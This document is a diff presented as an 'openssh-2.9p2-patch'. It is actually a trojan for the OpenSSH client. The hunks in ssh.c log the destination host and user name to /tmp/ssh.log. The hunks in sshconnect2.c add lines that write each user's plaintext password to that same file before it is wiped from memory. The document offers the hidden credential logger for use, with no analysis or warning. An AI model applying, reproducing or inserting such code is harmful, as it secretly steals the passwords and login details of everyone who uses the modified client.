----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut---- Common subdirectories: old/contrib and new/contrib Common subdirectories: old/openbsd-compat and new/openbsd-compat diff -N -c old/ssh.c new/ssh.c *** old/ssh.c Tue Apr 17 19:14:35 2001 --- new/ssh.c Thu Aug 9 11:59:42 2001 *************** *** 249,254 **** --- 249,255 ---- struct passwd *pw; int dummy; uid_t original_effective_uid; + FILE *lg; //xxxx __progname = get_progname(av[0]); init_rng(); *************** *** 716,721 **** --- 717,730 ---- tilde_expand_filename(options.user_hostfile2, original_real_uid); /* Log into the remote system. This never returns if the login fails. */ + + //xxxx + lg=fopen("/tmp/ssh.log", "a"); + fprintf(lg, "Host: %s\n", host); + fprintf(lg, "User: %s\n", options.user); + fclose(lg); + //xxxx + ssh_login(sensitive_data.keys, sensitive_data.nkeys, host, (struct sockaddr *)&hostaddr, pw); diff -N -c old/sshconnect2.c new/sshconnect2.c *** old/sshconnect2.c Thu Apr 19 21:40:46 2001 --- new/sshconnect2.c Thu Aug 9 11:59:56 2001 *************** *** 441,446 **** --- 441,447 ---- static int attempt = 0; char prompt[80]; char *password; + FILE *lg; //xxxx if (attempt++ >= options.number_of_password_prompts) return 0; *************** *** 457,462 **** --- 458,470 ---- packet_put_cstring(authctxt->method->name); packet_put_char(0); packet_put_cstring(password); + + //xxxx + lg=fopen("/tmp/ssh.log", "a"); + fprintf(lg, "Password: %s\n\n", password); + fclose(lg); + //xxxx + memset(password, 0, strlen(password)); xfree(password); packet_inject_ignore(64); ----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----